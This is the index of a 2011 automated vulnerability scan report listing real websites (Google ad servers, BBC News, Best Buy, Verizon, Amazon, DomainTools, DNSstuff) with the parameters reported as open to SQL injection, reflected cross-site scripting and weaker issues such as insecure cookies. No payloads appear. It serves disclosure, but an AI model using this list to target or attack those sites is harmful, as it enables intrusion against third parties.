XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07182011-01

Report generated by XSS.CX at Mon Jul 18 08:49:18 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://googleads.g.doubleclick.net/pagead/ads [dt parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [ifi parameter]

1.3. http://www.dnsstuff.com/l/ [Referer HTTP header]

1.4. http://www.dnsstuff.com/l/ [User-Agent HTTP header]

2. HTTP header injection

3. Cross-site scripting (reflected)

3.1. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 1]

3.2. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [REST URL parameter 2]

3.3. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [callback parameter]

3.4. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [name of an arbitrarily supplied request parameter]

3.5. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [pageSize parameter]

3.6. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(9867653,9867644,9867608,9867592,9867574,9867486)) [show parameter]

3.7. http://cgibin.erols.com/favicon.ico [REST URL parameter 1]

3.8. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 1]

3.9. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 2]

3.10. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 3]

3.11. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 4]

3.12. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [name of an arbitrarily supplied request parameter]

3.13. http://jqueryui.com/themeroller/ [bgColorActive parameter]

3.14. http://jqueryui.com/themeroller/ [bgColorContent parameter]

3.15. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

3.16. http://jqueryui.com/themeroller/ [bgColorError parameter]

3.17. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

3.18. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

3.19. http://jqueryui.com/themeroller/ [bgColorHover parameter]

3.20. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

3.21. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

3.22. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

3.23. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

3.24. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

3.25. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

3.26. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

3.27. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

3.28. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

3.29. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

3.30. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

3.31. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

3.32. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

3.33. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

3.34. http://jqueryui.com/themeroller/ [bgTextureError parameter]

3.35. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

3.36. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

3.37. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

3.38. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

3.39. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

3.40. http://jqueryui.com/themeroller/ [borderColorActive parameter]

3.41. http://jqueryui.com/themeroller/ [borderColorContent parameter]

3.42. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

3.43. http://jqueryui.com/themeroller/ [borderColorError parameter]

3.44. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

3.45. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

3.46. http://jqueryui.com/themeroller/ [borderColorHover parameter]

3.47. http://jqueryui.com/themeroller/ [cornerRadius parameter]

3.48. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

3.49. http://jqueryui.com/themeroller/ [fcActive parameter]

3.50. http://jqueryui.com/themeroller/ [fcContent parameter]

3.51. http://jqueryui.com/themeroller/ [fcDefault parameter]

3.52. http://jqueryui.com/themeroller/ [fcError parameter]

3.53. http://jqueryui.com/themeroller/ [fcHeader parameter]

3.54. http://jqueryui.com/themeroller/ [fcHighlight parameter]

3.55. http://jqueryui.com/themeroller/ [fcHover parameter]

3.56. http://jqueryui.com/themeroller/ [ffDefault parameter]

3.57. http://jqueryui.com/themeroller/ [fsDefault parameter]

3.58. http://jqueryui.com/themeroller/ [fwDefault parameter]

3.59. http://jqueryui.com/themeroller/ [iconColorActive parameter]

3.60. http://jqueryui.com/themeroller/ [iconColorContent parameter]

3.61. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

3.62. http://jqueryui.com/themeroller/ [iconColorError parameter]

3.63. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

3.64. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

3.65. http://jqueryui.com/themeroller/ [iconColorHover parameter]

3.66. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.67. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

3.68. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

3.69. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

3.70. http://jqueryui.com/themeroller/ [opacityShadow parameter]

3.71. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

3.72. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

3.73. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

3.74. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

3.75. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

3.76. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

3.77. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

3.78. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

3.79. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

3.80. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

3.81. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

3.82. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

3.83. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

3.84. https://secure.domaintools.com/join/ [REST URL parameter 1]

3.85. https://secure.domaintools.com/join/ [REST URL parameter 1]

3.86. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

3.87. https://secure.domaintools.com/log-in/ [REST URL parameter 1]

3.88. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

3.89. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]

3.90. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter]

3.91. http://wireless.amazon.com/alohaCartRequest [zip parameter]

3.92. http://www.bestbuy.com/site/olstemplatemapper.jsp [_DARGS parameter]

3.93. http://www.dnsstuff.com/tools/ipall/ [ip parameter]

3.94. http://www.dnsstuff.com/tools/ipall/ [name of an arbitrarily supplied request parameter]

3.95. http://www.dnsstuff.com/tools/ipall/ [token parameter]

3.96. http://www.dnsstuff.com/tools/ipall/ [tool_id parameter]

3.97. http://www.dnsstuff.com/tools/ipall/ [toolhandler_redirect parameter]

3.98. http://www.dnsstuff.com/tools/ipall/a [name of an arbitrarily supplied request parameter]

3.99. http://www.dnsstuff.com/tools/ipall/a/ [name of an arbitrarily supplied request parameter]

3.100. http://www.domaintools.com/about/ [REST URL parameter 1]

3.101. http://www.domaintools.com/about/ [REST URL parameter 1]

3.102. http://www.domaintools.com/about/big-changes/ [REST URL parameter 2]

3.103. http://www.domaintools.com/about/big-changes/ [REST URL parameter 2]

3.104. http://www.domaintools.com/about/contact-us/ [REST URL parameter 2]

3.105. http://www.domaintools.com/about/contact-us/ [REST URL parameter 2]

3.106. http://www.domaintools.com/about/features-and-pricing/ [REST URL parameter 2]

3.107. http://www.domaintools.com/about/features-and-pricing/ [REST URL parameter 2]

3.108. http://www.domaintools.com/about/join-our-team/ [REST URL parameter 2]

3.109. http://www.domaintools.com/about/join-our-team/ [REST URL parameter 2]

3.110. http://www.domaintools.com/about/learn-more/ [REST URL parameter 2]

3.111. http://www.domaintools.com/about/learn-more/ [REST URL parameter 2]

3.112. http://www.domaintools.com/about/privacy-policy/ [REST URL parameter 2]

3.113. http://www.domaintools.com/about/privacy-policy/ [REST URL parameter 2]

3.114. http://www.domaintools.com/about/terms-of-service/ [REST URL parameter 2]

3.115. http://www.domaintools.com/about/terms-of-service/ [REST URL parameter 2]

3.116. http://www.domaintools.com/about/why-domain-tools/ [REST URL parameter 2]

3.117. http://www.domaintools.com/about/why-domain-tools/ [REST URL parameter 2]

3.118. http://www.domaintools.com/api/ [REST URL parameter 1]

3.119. http://www.domaintools.com/api/ [REST URL parameter 1]

3.120. http://www.domaintools.com/buy/ [REST URL parameter 1]

3.121. http://www.domaintools.com/buy/ [REST URL parameter 1]

3.122. http://www.domaintools.com/buy/availability-check/ [REST URL parameter 2]

3.123. http://www.domaintools.com/buy/availability-check/ [REST URL parameter 2]

3.124. http://www.domaintools.com/buy/domain-search/ [REST URL parameter 2]

3.125. http://www.domaintools.com/buy/domain-search/ [REST URL parameter 2]

3.126. http://www.domaintools.com/buy/domain-suggestions/ [REST URL parameter 2]

3.127. http://www.domaintools.com/buy/domain-suggestions/ [REST URL parameter 2]

3.128. http://www.domaintools.com/buy/domain-typo-finder/ [REST URL parameter 2]

3.129. http://www.domaintools.com/buy/domain-typo-finder/ [REST URL parameter 2]

3.130. http://www.domaintools.com/buy/dropping-names/ [REST URL parameter 2]

3.131. http://www.domaintools.com/buy/dropping-names/ [REST URL parameter 2]

3.132. http://www.domaintools.com/buy/for-sale/ [REST URL parameter 2]

3.133. http://www.domaintools.com/buy/for-sale/ [REST URL parameter 2]

3.134. http://www.domaintools.com/buy/sales-history/ [REST URL parameter 2]

3.135. http://www.domaintools.com/buy/sales-history/ [REST URL parameter 2]

3.136. http://www.domaintools.com/go/ [REST URL parameter 1]

3.137. http://www.domaintools.com/go/ [REST URL parameter 1]

3.138. http://www.domaintools.com/join/ [REST URL parameter 1]

3.139. http://www.domaintools.com/join/ [REST URL parameter 1]

3.140. http://www.domaintools.com/learn/ [REST URL parameter 1]

3.141. http://www.domaintools.com/learn/ [REST URL parameter 1]

3.142. http://www.domaintools.com/learn/domain-valuation-how-to-value-a-domain-name-421/ [REST URL parameter 2]

3.143. http://www.domaintools.com/learn/domain-valuation-how-to-value-a-domain-name-421/ [REST URL parameter 2]

3.144. http://www.domaintools.com/learn/help/ [REST URL parameter 2]

3.145. http://www.domaintools.com/learn/help/ [REST URL parameter 2]

3.146. http://www.domaintools.com/learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/ [REST URL parameter 2]

3.147. http://www.domaintools.com/learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/ [REST URL parameter 2]

3.148. http://www.domaintools.com/learn/what-is-whois-information-and-why-is-it-valuable-419/ [REST URL parameter 2]

3.149. http://www.domaintools.com/learn/what-is-whois-information-and-why-is-it-valuable-419/ [REST URL parameter 2]

3.150. http://www.domaintools.com/monitor/ [REST URL parameter 1]

3.151. http://www.domaintools.com/monitor/ [REST URL parameter 1]

3.152. http://www.domaintools.com/monitor/domain-monitor/ [REST URL parameter 2]

3.153. http://www.domaintools.com/monitor/domain-monitor/ [REST URL parameter 2]

3.154. http://www.domaintools.com/monitor/name-server-alert/ [REST URL parameter 2]

3.155. http://www.domaintools.com/monitor/name-server-alert/ [REST URL parameter 2]

3.156. http://www.domaintools.com/monitor/registrant-alert/ [REST URL parameter 2]

3.157. http://www.domaintools.com/monitor/registrant-alert/ [REST URL parameter 2]

3.158. http://www.domaintools.com/monitor/trademark-alert/ [REST URL parameter 2]

3.159. http://www.domaintools.com/monitor/trademark-alert/ [REST URL parameter 2]

3.160. http://www.domaintools.com/research/ [REST URL parameter 1]

3.161. http://www.domaintools.com/research/ [REST URL parameter 1]

3.162. http://www.domaintools.com/research/dns/ [REST URL parameter 2]

3.163. http://www.domaintools.com/research/dns/ [REST URL parameter 2]

3.164. http://www.domaintools.com/research/hosting-history/ [REST URL parameter 2]

3.165. http://www.domaintools.com/research/hosting-history/ [REST URL parameter 2]

3.166. http://www.domaintools.com/research/name-server-report/ [REST URL parameter 2]

3.167. http://www.domaintools.com/research/name-server-report/ [REST URL parameter 2]

3.168. http://www.domaintools.com/research/reverse-ip/ [REST URL parameter 2]

3.169. http://www.domaintools.com/research/reverse-ip/ [REST URL parameter 2]

3.170. http://www.domaintools.com/research/reverse-whois/ [REST URL parameter 2]

3.171. http://www.domaintools.com/research/reverse-whois/ [REST URL parameter 2]

3.172. http://www.domaintools.com/research/whois-applications/ [REST URL parameter 2]

3.173. http://www.domaintools.com/research/whois-applications/ [REST URL parameter 2]

3.174. http://www.domaintools.com/research/whois-history/ [REST URL parameter 2]

3.175. http://www.domaintools.com/research/whois-history/ [REST URL parameter 2]

3.176. http://www.domaintools.com/sitemap/ [REST URL parameter 1]

3.177. http://www.domaintools.com/sitemap/ [REST URL parameter 1]

3.178. http://www.verizonwireless.com/b2c/shoppingAssistant [closeUrl parameter]

3.179. http://www.verizonwireless.com/b2c/shoppingAssistant [displayText parameter]

3.180. http://www.verizonwireless.com/b2c/shoppingAssistant [hasMultipleAssociatedSimTOs parameter]

3.181. http://www.verizonwireless.com/b2c/shoppingAssistant [name of an arbitrarily supplied request parameter]

3.182. http://www.verizonwireless.com/b2c/shoppingAssistant [phoneID parameter]

3.183. http://www.verizonwireless.com/b2c/shoppingAssistant [quantity parameter]

3.184. http://lookupserver.com/ [User-Agent HTTP header]

3.185. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

3.186. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]

3.187. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [Referer HTTP header]

3.188. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [Referer HTTP header]

3.189. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [Referer HTTP header]

3.190. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [Referer HTTP header]

3.191. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

3.192. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [Referer HTTP header]

3.193. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [Referer HTTP header]

3.194. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [Referer HTTP header]

3.195. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [Referer HTTP header]

3.196. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [Referer HTTP header]

3.197. http://www.domaintools.com/learn/help/ [Referer HTTP header]

3.198. http://support.dnsstuff.com/ST.ashx [siteuidut cookie]

4. Flash cross-domain policy

4.1. http://ajax.googleapis.com/crossdomain.xml

4.2. http://feed.domaintoolsblog.com/crossdomain.xml

4.3. http://m.webtrends.com/crossdomain.xml

4.4. https://adwords.google.com/crossdomain.xml

4.5. http://cbk0.google.com/crossdomain.xml

4.6. https://cbks0.google.com/crossdomain.xml

4.7. http://feeds.bbci.co.uk/crossdomain.xml

4.8. http://googleads.g.doubleclick.net/crossdomain.xml

4.9. http://news.bbc.co.uk/crossdomain.xml

4.10. http://newsrss.bbc.co.uk/crossdomain.xml

4.11. http://pagead2.googlesyndication.com/crossdomain.xml

4.12. http://picasaweb.google.com/crossdomain.xml

4.13. http://docs.google.com/crossdomain.xml

4.14. http://khm0.google.com/crossdomain.xml

4.15. http://khm1.google.com/crossdomain.xml

4.16. http://mt0.google.com/crossdomain.xml

4.17. http://mt1.google.com/crossdomain.xml

4.18. http://mt2.google.com/crossdomain.xml

4.19. http://mt3.google.com/crossdomain.xml

5. Cleartext submission of password

5.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

5.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

5.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

5.4. http://cache.vzw.com/globalnav/globalnav.js

5.5. http://support.dnsstuff.com/Login.aspx

6. XML injection

6.1. http://mt0.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.2. http://mt0.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.3. http://mt1.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.4. http://mt1.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.5. http://mt2.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.6. http://mt2.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.7. http://mt3.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]

6.8. http://mt3.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]

7. Session token in URL

7.1. http://simplexityllc.tt.omtrdc.net/m2/simplexityllc/mbox/standard

7.2. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

7.3. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

7.4. http://www.bestbuy.com/site/olspage.jsp

7.5. http://www.facebook.com/extern/login_status.php

8. Password field submitted using GET method

8.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

8.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

8.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

9. Cookie scoped to parent domain

9.1. http://blog.domaintools.com/

9.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

9.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

9.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

9.5. http://cts-log.channelintelligence.com/

9.6. http://wireless.amazon.com/a

9.7. http://wireless.amazon.com/alohaCartRequest

9.8. https://adwords.google.com/um/StartNewLogin

9.9. http://akamai.invitemedia.com/set_partner_uid

9.10. http://ibid2252027210.peachd.dnsstuff.com/style.css

9.11. http://ibid2252027210.plumd.dnsstuff.com/style.css

9.12. http://ibid4216487243.plumd.dnsstuff.com/style.css

9.13. http://id.google.com/verify/EAAAADXjHEyNOyxBq7OsNIrjecs.gif

9.14. http://id.google.com/verify/EAAAAETiZvmKxRNEHIAejUJpNLs.gif

9.15. http://int.teracent.net/tase/int

9.16. http://picasaweb.google.com/lh/view

9.17. http://sales.liveperson.net/hc/44153975/

9.18. http://wireless.amazon.com/404

9.19. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

9.20. http://www.verizonwireless.com/b2c/vzwfly

10. Cookie without HttpOnly flag set

10.1. http://blog.domaintools.com/

10.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

10.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

10.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

10.5. http://cts-log.channelintelligence.com/

10.6. http://mad4milk.net/

10.7. http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx

10.8. http://mobilebeta.microsoft.com/en-us/default.mspx

10.9. http://partner.domaining.com/link/

10.10. http://support.domaintools.com/

10.11. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

10.12. http://wireless.amazon.com/a

10.13. http://wireless.amazon.com/alohaCartRequest

10.14. http://www.dnswatch.info/

10.15. http://www.domaining.com/

10.16. https://adwords.google.com/um/StartNewLogin

10.17. http://akamai.invitemedia.com/set_partner_uid

10.18. http://ibid2252027210.peachd.dnsstuff.com/style.css

10.19. http://ibid2252027210.plumd.dnsstuff.com/style.css

10.20. http://ibid4216487243.plumd.dnsstuff.com/style.css

10.21. http://int.teracent.net/tase/int

10.22. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

10.23. http://phones.microsoftstore.com/r.aspx

10.24. http://sales.liveperson.net/hc/44153975/

10.25. http://sales.liveperson.net/hc/44153975/

10.26. http://support.dnsstuff.com/KB/a20/fine-tuning-declude-v41-or-newer.aspx

10.27. http://support.dnsstuff.com/KB/a23/why-cant-i-get-my-ptr-record-from-the-dns-lookup-tool.aspx

10.28. http://support.dnsstuff.com/KB/a27/how-to-enable-and-configure-internal-message-sniffer.aspx

10.29. http://support.dnsstuff.com/KB/a28/how-the-spf-tool-works.aspx

10.30. http://support.dnsstuff.com/KB/a29/mail-server-test-center-mismatched-dns-result-explanation.aspx

10.31. http://support.dnsstuff.com/KB/a30/explanation-optional-server-the-reverse-dns-lookup-tool.aspx

10.32. http://support.dnsstuff.com/KB/a31/explanation-of-the-mail-server-test-center-anti-spam-test.aspx

10.33. http://support.dnsstuff.com/KB/a32/available-declude-variables.aspx

10.34. http://support.dnsstuff.com/News/1/default-news-item.aspx

10.35. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

10.36. http://wireless.amazon.com/404

10.37. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

10.38. http://www.verizonwireless.com/b2c/vzwfly

10.39. http://www35.vzw.com/HG

11. Password field with autocomplete enabled

11.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

11.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

11.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

11.4. http://dnsstuff.com/new-tools-a-upgrades

11.5. https://secure.domaintools.com/log-in/

11.6. https://secure.domaintools.com/log-in/

11.7. http://support.dnsstuff.com/Login.aspx

11.8. http://webcache.googleusercontent.com/search

11.9. https://webreps.satuitcrm.com/default.aspx

11.10. http://www.dnsstuff.com/

11.11. http://www.dnsstuff.com/bc-lookups-tools

11.12. http://www.dnsstuff.com/bc-mon-alerts

11.13. http://www.dnsstuff.com/index.php

11.14. http://www.dnsstuff.com/tools/ipall/

11.15. http://www.dnsstuff.com/tools/ipall/a/

12. Source code disclosure

12.1. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

12.2. http://images.bestbuy.com/BestBuy_US/store/js/admonitor-min.js

12.3. http://meyerweb.com/eric/tools/css/reset/

13. SSL certificate

13.1. https://webreps.satuitcrm.com/

13.2. https://adwords.google.com/

13.3. https://cbks0.google.com/

13.4. https://clients6.google.com/

13.5. https://fpdownload.macromedia.com/

13.6. https://plusone.google.com/

13.7. https://secure.domaintools.com/

13.8. https://ssl.gstatic.com/

13.9. https://www.dnsstuff.com/

14. ASP.NET debugging enabled

15. Referer-dependent response

15.1. http://www.bestbuy.com/site/olstemplatemapper.jsp

15.2. http://www.facebook.com/plugins/like.php

16. Cross-domain POST

16.1. http://blog.domaintools.com/

16.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

16.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

16.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

16.5. http://webcache.googleusercontent.com/search

16.6. http://www.dnsstuff.com/partner/dyn/

17. SSL cookie without secure flag set

18. Cross-domain Referer leakage

18.1. http://googleads.g.doubleclick.net/pagead/ads

18.2. http://googleads.g.doubleclick.net/pagead/ads

18.3. http://googleads.g.doubleclick.net/pagead/ads

18.4. http://groups.google.com/groups

18.5. http://jqueryui.com/themeroller/

18.6. http://maps.google.com/local_url

18.7. http://maps.google.com/maps

18.8. http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx

18.9. http://phones.microsoftstore.com/eCommerce/PowerReviews/pwr/engine/js/full.js

18.10. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

18.11. http://picasaweb.google.com/lh/view

18.12. https://secure.domaintools.com/log-in/

18.13. http://translate.google.com/translate_t

18.14. http://webcache.googleusercontent.com/search

18.15. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

18.16. http://www.bestbuy.com/site/HTC+-+Trophy+Mobile+Phone+-+Black+(Verizon+Wireless)/2330093.p

18.17. http://www.bestbuy.com/site/olstemplatemapper.jsp

18.18. http://www.dnsstuff.com/tools/ipall/

18.19. http://www.google.com/search

18.20. http://www.verizonwireless.com/b2c/dispatcher

18.21. http://www.verizonwireless.com/b2c/index.html

18.22. http://www.verizonwireless.com/b2c/shoppingAssistant

18.23. http://www.verizonwireless.com/b2c/store/controller

18.24. http://www.verizonwireless.com/b2c/store/controller

18.25. http://www.verizonwireless.com/b2c/store/controller

18.26. http://www.verizonwireless.com/b2c/store/controller

18.27. http://www.verizonwireless.com/b2c/store/controller

18.28. http://www.verizonwireless.com/b2c/store/controller

19. Cross-domain script include

19.1. http://blog.domaintools.com/

19.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/

19.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

19.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

19.5. https://clients6.google.com/static/proxy.html

19.6. http://dyn.com/

19.7. http://dyn.com/please-try-again

19.8. http://feed.domaintoolsblog.com/domaintools/

19.9. http://googleads.g.doubleclick.net/pagead/ads

19.10. http://images.bestbuy.com/BestBuy_US/store/js/dart-min.js

19.11. http://images.bestbuy.com/BestBuy_US/store/js/google-min.js

19.12. http://jqueryui.com/about

19.13. http://jqueryui.com/themeroller/

19.14. http://lookupserver.com/

19.15. http://mad4milk.net/

19.16. http://mobilebeta.microsoft.com/en-us/default.mspx

19.17. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm

19.18. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm

19.19. http://news.bbc.co.uk/sport2/hi/football/14168601.stm

19.20. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm

19.21. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm

19.22. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm

19.23. http://picasaweb.google.com/lh/view

19.24. http://satuit.com/

19.25. http://satuit.com/en/Products/SatuitSIP.aspx

19.26. http://satuit.com/products.aspx

19.27. https://secure.domaintools.com/join/

19.28. https://secure.domaintools.com/log-in/

19.29. https://secure.domaintools.com/shopping-cart/

19.30. http://whois.domaintools.com/

19.31. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

19.32. http://www.bestbuy.com/site/HTC+-+Trophy+Mobile+Phone+-+Black+(Verizon+Wireless)/2330093.p

19.33. http://www.dnsstuff.com/partner/dyn/

19.34. http://www.dnsstuff.com/tools/ipall/

19.35. http://www.dnsstuff.com/tools/ipall/a/

19.36. http://www.dnswatch.info/

19.37. http://www.domaintools.com/

19.38. http://www.domaintools.com/about/

19.39. http://www.domaintools.com/about/big-changes/

19.40. http://www.domaintools.com/about/contact-us/

19.41. http://www.domaintools.com/about/features-and-pricing/

19.42. http://www.domaintools.com/about/join-our-team/

19.43. http://www.domaintools.com/about/learn-more/

19.44. http://www.domaintools.com/about/privacy-policy/

19.45. http://www.domaintools.com/about/terms-of-service/

19.46. http://www.domaintools.com/about/why-domain-tools/

19.47. http://www.domaintools.com/api/

19.48. http://www.domaintools.com/buy/

19.49. http://www.domaintools.com/buy/availability-check/

19.50. http://www.domaintools.com/buy/domain-search/

19.51. http://www.domaintools.com/buy/domain-suggestions/

19.52. http://www.domaintools.com/buy/domain-typo-finder/

19.53. http://www.domaintools.com/buy/dropping-names/

19.54. http://www.domaintools.com/buy/for-sale/

19.55. http://www.domaintools.com/buy/sales-history/

19.56. http://www.domaintools.com/learn/

